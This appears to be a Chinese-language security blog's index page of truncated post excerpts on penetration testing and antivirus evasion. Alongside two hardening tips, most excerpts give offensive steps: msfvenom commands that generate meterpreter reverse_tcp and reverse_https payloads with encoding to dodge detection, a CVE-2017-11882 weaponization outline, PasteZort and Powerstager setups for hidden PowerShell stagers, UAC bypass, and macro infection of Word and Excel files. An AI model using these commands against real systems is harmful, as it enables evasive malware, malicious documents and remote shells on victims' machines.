辅助提权Windows-Exploit-Suggester

辅助提权Windows-Exploit-Suggester
在渗透过程当中,经常会遇到拿下shell需要对服务器进行提权的问题,而在提权的步骤当中,怎么判断该使用哪种漏洞呢? 这里介绍一种工具可以帮助到我们:Windows-Exploit-Suggester        //仅限Windows 一、工具下载 https://github.com/GDSSecurity/Windows-Exploit-Suggester/ 二、使用过程 0x1:syst...
阅读全文

Apache禁止目录执行php脚本执行权限方法

通常我如果在使用IIS的情况需要禁止某些目录不能有脚本执行权限。通常选择对应目录下加入web.config文件把执行相应的脚本权限就可以了。 那Apache中则是在配置文件中加入如下一段来禁止相应目录下的执行脚本权限。 <Directory /目录路径/>     php_flag engine off </Directory&...
阅读全文

修改默认服务器远程登录端口

修改默认服务器远程登录端口
 windows  远程端口默认的是3389! 但是为了安全,不让不法分子知道我们的远程连接的端口, 那有什么工具或者什途径可以修改???      方法如下:       开始--运行--regedit     &...
阅读全文

CVE-2017-11882实战免杀

CVE-2017-11882实战免杀
目录   一:生成payload 二:创建C#工程文件 三:将生成的exe转换成js 四:结合web server五:office上场 一:生成payload使用msfvenom生成C#的payload msfvenom -p windows/meterpreter/reverse_https -a x86 -f csharp --platform windows -o https.csharp -b "\x00\xff" LHOS...
阅读全文

Pastezort|MSF|Powershell|免杀

Pastezort|MSF|Powershell|免杀
1.下载并运行 git clone https://github.com/ZettaHack/PasteZort.git python PasteZ0rt.py 2.选择平台 选择目标平台,我这里已windows为主,选择1号 windows。 3.选择payload 选择msf的payload,我这边选择的还是1。然后填写IP和端口 4.随意填写一些网页信息,并同时开...
阅读全文

Powerstager免杀

Powerstager免杀
该脚本创建一个可执行的stager,该stager下载选定的powershell payload,将其加载到内存中,并使用模糊的EC方法执行它 0x1 ►Installation: - git clone https://github.com/z0noxz/powerstager - cd powerstager - apt-get install python3-pip - apt-get install mingw-w64 - pip3 install (module-name)...
阅读全文

MSF后渗透绕过UAC

MSF后渗透绕过UAC
以下属于获取的权限在administrator组里,但是因为UAC而获取不到system权限的情况                     ...
阅读全文

VBScript感染

VBScript感染
VBScript感染方式 -利用宏 感染excl和wrod文档 -生成VBscript脚本 msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe 0x1 :一共会生成两个部分 第一部分: 第二部分: 0x2:在Word里创建宏 0x2.1 然后把生成第一...
阅读全文